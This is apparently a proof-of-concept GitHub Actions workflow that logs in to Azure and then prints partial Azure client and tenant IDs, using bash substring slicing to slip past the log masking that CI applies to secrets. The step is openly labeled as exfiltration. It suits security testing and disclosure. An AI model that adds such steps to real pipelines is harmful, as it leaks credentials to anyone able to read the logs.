name: PoC - Azure Secret Exposure

on:
  workflow_dispatch:

jobs:
  azure-test:
    runs-on: ubuntu-latest
    steps:
      - name: Log in to Azure with Service Principal
        uses: azure/login@v1
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          client-secret: ${{ secrets.AZURE_CLIENT_SECRET }}

      - name: Exfiltrate masked secret (PoC)
        run: |
          echo "Client ID prefix: ${AZURE_CLIENT_ID:0:6}****${AZURE_CLIENT_ID: -4}"
          echo "Tenant ID prefix: ${AZURE_TENANT_ID:0:6}****${AZURE_TENANT_ID: -4}"
        env:
          AZURE_CLIENT_ID: ${{ secrets.AZURE_CLIENT_ID }}
          AZURE_TENANT_ID: ${{ secrets.AZURE_TENANT_ID }}
